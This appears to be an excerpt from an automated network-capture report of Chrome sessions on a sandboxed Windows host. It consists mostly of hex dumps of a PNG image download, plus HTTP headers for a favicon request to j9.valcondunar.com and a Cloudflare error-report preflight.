                                                                                                                    2024-11-25 18:52:45 UTC1390INData Raw: 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00
                                                                                                                    Data Ascii: 3@13|3@13|3@13|3@13|3@13|3
                                                                                                                    2024-11-25 18:52:45 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31
                                                                                                                    Data Ascii: 13|3@13|3@13|3@13|3@13|3@1
                                                                                                                    2024-11-25 18:52:45 UTC1390INData Raw: 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00
                                                                                                                    Data Ascii: |3@13|3@13|3@13|3@13|3@13|
                                                                                                                    2024-11-25 18:52:45 UTC1390INData Raw: 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 f0 d8 bb 9f 10 39 cf fb 80 e3 cf fb 67 fe ac 64 cb 76 40 71 da 83 9c 3f 26 14 c9 92 bd 4a 23 0c b1 72 68 c8 b1 e9 a1 89 43 b1 8a 88 15 50 a1 31 24 84 1a 92 42 08 3d e4 90 1c da a2 50 30 54 04 51 19 23 27 a7 96 d2 43 88 09 c6 2d c1 c1 5e 6b ad f5 21 b4 49 ab 43 53 67 a1 5a 39 52 b5 ab dd d9 e9 61 e3 ad ab 3f bb 3b b3 b3 fb 7b 9f 99 cf e7 60 76 77 e6 7d fd bb 8d c7 cf f7 7d 1e 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00
                                                                                                                    Data Ascii: @13|3@13|3@9gdv@q?&J#rhCP1$B=P0TQ#'C-^k!ICSgZ9Ra?;{`vw}}&
                                                                                                                    2024-11-25 18:52:45 UTC1390INData Raw: 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: &`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>
                                                                                                                    2024-11-25 18:52:45 UTC1390INData Raw: e3 c3 e7 3a 00 64 ac 28 52 d7 53 77 00 00 00 00 00 30 a9 ba ed ba 70 78 0f 00 8c 0b 31 1f 00 64 ac db aa 4b df d1 01 00 00 00 00 60 52 95 45 d1 6d 79 ec 1f 00 c6 84 98 0f 00 72 55 55 0e d8 05 00 00 00 00 80 49 d7 6e 55 55 65 e9 1f 00 c6 81 4f 74 00 c8 55 57 c9 07 00 00 00 00 00 58 32 00 80 71 21 e6 03 80 2c b5 ea b2 f6 98 1d 00 00 00 00 00 90 52 5d 95 ad da aa 01 00 64 cf c7 39 00 64 a9 d3 aa a3 47 00 00 00 00 00 00 9a c2 c2 01 00 8c 01 31 1f 00 e4 a7 55 57 55 59 44 4f 01 00 00 00 00 00 34 45 55 16 ad da 61 bb 00 90 37 31 1f 00 e4 a7 d3 f2 6d 1c 00 00 00 00 00 f8 7f 2c 1f 00 40 ee c4 7c 00 90 99 ba 2a 6d cb 07 00 00 00 00 00 dc a2 2a 8b ba d2 00 00 40 c6 7c 90 03 40 66 3c 57 07 00 00 00 00 00 dc 91 45 04 00 c8 9a 98 0f 00 72 52 7a a8 0e 00 00 00 00 00 b8
                                                                                                                    Data Ascii: :d(RSw0px1dK`REmyrUUInUUeOtUWX2q!,R]d9dG1UWUYDO4EUa71m,@|*m*@|@f<WErRz
                                                                                                                    2024-11-25 18:52:45 UTC1390INData Raw: 64 3a 7a 0a 00 00 00 00 00 00 00 9a 4e cc 07 00 64 23 c7 92 af 73 e2 54 f4 14 00 00 00 00 00 00 00 64 40 cc 07 00 e4 41 c9 07 00 00 00 00 00 00 c0 18 13 f3 01 00 19 50 f2 01 00 00 00 00 00 00 30 de c4 7c 00 40 d3 ad cc ce 28 f9 00 00 00 00 00 00 00 18 6f 75 f4 00 00 00 9b b8 f2 d5 d3 3b 77 f3 ee f4 b1 b5 1f da 47 a6 d7 7e b8 39 3b 93 52 5a 9c 79 75 b8 1b 2a f9 00 00 00 00 00 00 00 18 82 98 0f 00 68 b4 5f 3f fb a5 91 df b3 3b 7d 6c ea c4 a9 94 52 fd 6e c0 f7 5e 9d 94 52 4a f7 a6 94 52 5a 3a 7f 36 a5 b4 f5 7d 01 95 7c 00 00 00 00 00 00 00 0c a7 58 b8 b6 18 3d 03 00 b0 89 fb f6 76 a2 47 88 b1 74 fe ec 08 0f d8 5d 6b f8 ee 18 f0 8d 64 12 25 1f 00 00 00 00 00 8d 72 f5 fa 52 f4 08 00 c0 00 c4 7c 00 90 81 89 8d f9 e6 3f 7d 6c 24 f7 d9 4e c6 f7 5e 1b 24 7d 4a 3e
                                                                                                                    Data Ascii: d:zNd#sTd@AP0|@(ou;wG~9;RZyu*h_?;}lRn^RJRZ:6}|X=vGt]kd%rR|?}l$N^$}J>
                                                                                                                    2024-11-25 18:52:45 UTC1390INData Raw: ae 1f 7b 7c fe 33 2f 2f ef bd fd a5 86 6c ce 37 dc 19 bb 8f 3d 54 8f 7c 12 00 00 00 00 00 00 00 f2 22 e6 03 00 1a a4 78 e0 f1 bb bd 74 cb d1 ba b7 78 e5 ed 37 cf cd bd b8 33 43 6d d5 ec e5 de 70 67 ec 1e 7e a8 18 f9 30 00 00 00 00 00 00 00 e4 45 cc 07 00 34 c8 dd 4e da dd b8 e4 5b 73 e6 d2 85 1d 98 68 00 c3 6d cb 97 52 72 c6 2e 00 00 00 00 00 00 00 62 3e 00 a0 59 aa 0f 9d 79 ef af 97 6e 3e fc f8 fc 67 36 2d f9 d6 7c f9 c7 df dc 91 99 b6 60 e8 6d f9 8e 1e 70 c6 2e 00 00 00 00 00 00 00 62 3e 00 a0 c1 5e b8 7e ec 8b 57 0f 6e fd fd 51 87 ed ce 5e ee 7d e5 fc 8d e1 ae fd e3 4f b6 46 3b 0c 00 00 00 00 00 00 00 39 12 f3 01 00 cd b2 7e d2 ee 56 8e d6 bd dd 99 4b 17 76 bf e7 1b fa 80 dd e4 8c 5d 00 00 00 00 00 00 00 52 4a 29 39 d6 0d 00 68 9c 7f ff f0 0b 7f f3 fa
                                                                                                                    Data Ascii: {|3//l7=T|"xtx73Cmpg~0E4N[shmRr.b>Yyn>g6-|`mp.b>^~WnQ^}OF;9~VKv]RJ)9h
                                                                                                                    2024-11-25 18:52:45 UTC1390INData Raw: 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13
                                                                                                                    Data Ascii: @01@01@01@01@01@01@01@01@01@01


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    15192.168.2.449797104.21.68.1324432304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:45 UTC1321OUTGET /favicon.ico HTTP/1.1
                                                                                                                    Host: j9.valcondunar.com
                                                                                                                    Connection: keep-alive
                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                    Referer: https://j9.valcondunar.com/b3k54/
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Cookie: XSRF-TOKEN=eyJpdiI6IktuUmNPVmhkM09vdnRKWlMzMmJ6WlE9PSIsInZhbHVlIjoiSGNKdUFlZHM4Y2Q0Mnh5eGpLRmpHVkZra2VJNDNlZHkwVWI3cEkxdDlKZDNZWkU5VWxyUjN3ZzdTaVFlSEVkd0cyUk5zUHRHMC9WZXhhTDhRTktsTE1wRGdEc293cjZwRW5ieTNuNTdiWlBUZTVYUlY3T3owVGp6RG1Kem1NWEsiLCJtYWMiOiJjYTY3MDFhMDE4OWQ2MDJhMjQzNmViMDhmYzg1Mzg3ZGU3NGFiZjc4ZWFkZjhkZWIwZTYwNGMyYzczYmEwYzQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IllsdU9xUDZwVXZiWm9Rb3ZIS2FBMkE9PSIsInZhbHVlIjoiVWxhS2hCdlZSbGl0VHF0cXI4YXl4Mk9LdUZ2bDM4YnU0OUFWM2ZOaHU4MjhZTW9HRTRSN2puLzVQbUZCVURKTWZWbC9GRGd4UVdtbVptQXJBeWFxTHZmVDFrek9qc0NVVTRQcmI1bUVHMVdMMjUvM1ZpMHJhLzJ2Wi9GUklISlEiLCJtYWMiOiIxMWI1YWFlOTFkOWNlODRlMGQ3ODFlZDc4ZTIwMmUzN2UzZjQ3ZjkwMjI0ZDE2MTYxMjZhNzYwMDgyNDkwMTFlIiwidGFnIjoiIn0%3D
                                                                                                                    2024-11-25 18:52:46 UTC1018INHTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 25 Nov 2024 18:52:46 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=14400
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNAxRHPRSwS1sTmOzA%2BuWArALfgGUee2J8LPho5vr3zWIMz39yr6Gssyy5bXrfbm%2BnFk8chGXBg4QnzklHZKhwZtCmIbAdgsiozEqExLJaLqG02fH4w5PSIy3Y4a2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=35713&sent=289&recv=97&lost=0&retrans=0&sent_bytes=367407&recv_bytes=10457&delivery_rate=3025243&cwnd=274&unsent_bytes=0&cid=70d378ea6a098968&ts=17089&x=0"
                                                                                                                    CF-Cache-Status: EXPIRED
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8e83d6753e0d1835-EWR
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1647&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1899&delivery_rate=1667618&cwnd=139&unsent_bytes=0&cid=4b95cb1b43577c08&ts=8060&x=0"
                                                                                                                    2024-11-25 18:52:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    16192.168.2.44980435.190.80.14432304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:48 UTC535OUTOPTIONS /report/v4?s=pNAxRHPRSwS1sTmOzA%2BuWArALfgGUee2J8LPho5vr3zWIMz39yr6Gssyy5bXrfbm%2BnFk8chGXBg4QnzklHZKhwZtCmIbAdgsiozEqExLJaLqG02fH4w5PSIy3Y4a2w%3D%3D HTTP/1.1
                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                    Connection: keep-alive
                                                                                                                    Origin: https://j9.valcondunar.com
                                                                                                                    Access-Control-Request-Method: POST
                                                                                                                    Access-Control-Request-Headers: content-type
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    2024-11-25 18:52:48 UTC336INHTTP/1.1 200 OK
                                                                                                                    Content-Length: 0
                                                                                                                    access-control-max-age: 86400
                                                                                                                    access-control-allow-methods: POST, OPTIONS
                                                                                                                    access-control-allow-origin: *
                                                                                                                    access-control-allow-headers: content-type, content-length
                                                                                                                    date: Mon, 25 Nov 2024 18:52:48 GMT
                                                                                                                    Via: 1.1 google
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    17192.168.2.449803142.250.181.654432304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:48 UTC680OUTGET /img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png HTTP/1.1
                                                                                                                    Host: blogger.googleusercontent.com
                                                                                                                    Connection: keep-alive
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    Accept: */*
                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                    Sec-Fetch-Site: none
                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    2024-11-25 18:52:49 UTC470INHTTP/1.1 200 OK
                                                                                                                    Content-Type: image/png
                                                                                                                    Vary: Origin
                                                                                                                    Access-Control-Expose-Headers: Content-Length
                                                                                                                    ETag: "v367e"
                                                                                                                    Expires: Tue, 26 Nov 2024 18:52:49 GMT
                                                                                                                    Cache-Control: public, max-age=86400, no-transform
                                                                                                                    Content-Disposition: inline;filename="userinter.png"
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Date: Mon, 25 Nov 2024 18:52:49 GMT
                                                                                                                    Server: fife
                                                                                                                    Content-Length: 87859
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close
                                                                                                                    2024-11-25 18:52:49 UTC920INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0d 44 00 00 07 80 08 02 00 00 00 33 3b 2b ce 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 5f 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 e3 4a 4f cd 4b 2d ca 4c 56 28 28 ca 4f cb cc 49 e5 52 00 03 63 13 2e 13 4b 13 4b a3 44 03 03 03 0b 03 08 30 34 30 30 36 04 92 46 40 b6 39 54 28 d1 00 05 98 98 9b a5 01 a1 b9 59 b2 99 29 88 cf 05 00 4f ba 15 68 1b 2d d8 8c 00 00 20 00 49 44 41 54 78 9c ec da 21 01 00 20 00 c0 30 a0 7f 58 04 02 49 8c 0b b6 04 0f f0 b9 cf 1d 00 00 00 00 00 00 00 00 00 40 67 d5 01 00 00 00 00 00 00 00 00 00 f0 3b 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00
                                                                                                                    Data Ascii: PNGIHDRD3;+sBITO_zTXtRaw profile type APP1JOK-LV((OIRc.KKD04006F@9T(Y)Oh- IDATx! 0XI@g;3|3@
                                                                                                                    2024-11-25 18:52:49 UTC1390INData Raw: 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00
                                                                                                                    Data Ascii: 3@13|3@13|3@13|3@13|3@13|3
                                                                                                                    2024-11-25 18:52:49 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31
                                                                                                                    Data Ascii: 13|3@13|3@13|3@13|3@13|3@1
                                                                                                                    2024-11-25 18:52:49 UTC1390INData Raw: 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00
                                                                                                                    Data Ascii: |3@13|3@13|3@13|3@13|3@13|
                                                                                                                    2024-11-25 18:52:49 UTC1390INData Raw: 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 f0 d8 bb 9f 10 39 cf fb 80 e3 cf fb 67 fe ac 64 cb 76 40 71 da 83 9c 3f 26 14 c9 92 bd 4a 23 0c b1 72 68 c8 b1 e9 a1 89 43 b1 8a 88 15 50 a1 31 24 84 1a 92 42 08 3d e4 90 1c da a2 50 30 54 04 51 19 23 27 a7 96 d2 43 88 09 c6 2d c1 c1 5e 6b ad f5 21 b4 49 ab 43 53 67 a1 5a 39 52 b5 ab dd d9 e9 61 e3 ad ab 3f bb 3b b3 b3 fb 7b 9f 99 cf e7 60 76 77 e6 7d fd bb 8d c7 cf f7 7d 1e 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00
                                                                                                                    Data Ascii: @13|3@13|3@9gdv@q?&J#rhCP1$B=P0TQ#'C-^k!ICSgZ9Ra?;{`vw}}&
                                                                                                                    2024-11-25 18:52:49 UTC1390INData Raw: 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: &`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>
                                                                                                                    2024-11-25 18:52:49 UTC1390INData Raw: e3 c3 e7 3a 00 64 ac 28 52 d7 53 77 00 00 00 00 00 30 a9 ba ed ba 70 78 0f 00 8c 0b 31 1f 00 64 ac db aa 4b df d1 01 00 00 00 00 60 52 95 45 d1 6d 79 ec 1f 00 c6 84 98 0f 00 72 55 55 0e d8 05 00 00 00 00 80 49 d7 6e 55 55 65 e9 1f 00 c6 81 4f 74 00 c8 55 57 c9 07 00 00 00 00 00 58 32 00 80 71 21 e6 03 80 2c b5 ea b2 f6 98 1d 00 00 00 00 00 90 52 5d 95 ad da aa 01 00 64 cf c7 39 00 64 a9 d3 aa a3 47 00 00 00 00 00 00 9a c2 c2 01 00 8c 01 31 1f 00 e4 a7 55 57 55 59 44 4f 01 00 00 00 00 00 34 45 55 16 ad da 61 bb 00 90 37 31 1f 00 e4 a7 d3 f2 6d 1c 00 00 00 00 00 f8 7f 2c 1f 00 40 ee c4 7c 00 90 99 ba 2a 6d cb 07 00 00 00 00 00 dc a2 2a 8b ba d2 00 00 40 c6 7c 90 03 40 66 3c 57 07 00 00 00 00 00 dc 91 45 04 00 c8 9a 98 0f 00 72 52 7a a8 0e 00 00 00 00 00 b8
                                                                                                                    Data Ascii: :d(RSw0px1dK`REmyrUUInUUeOtUWX2q!,R]d9dG1UWUYDO4EUa71m,@|*m*@|@f<WErRz
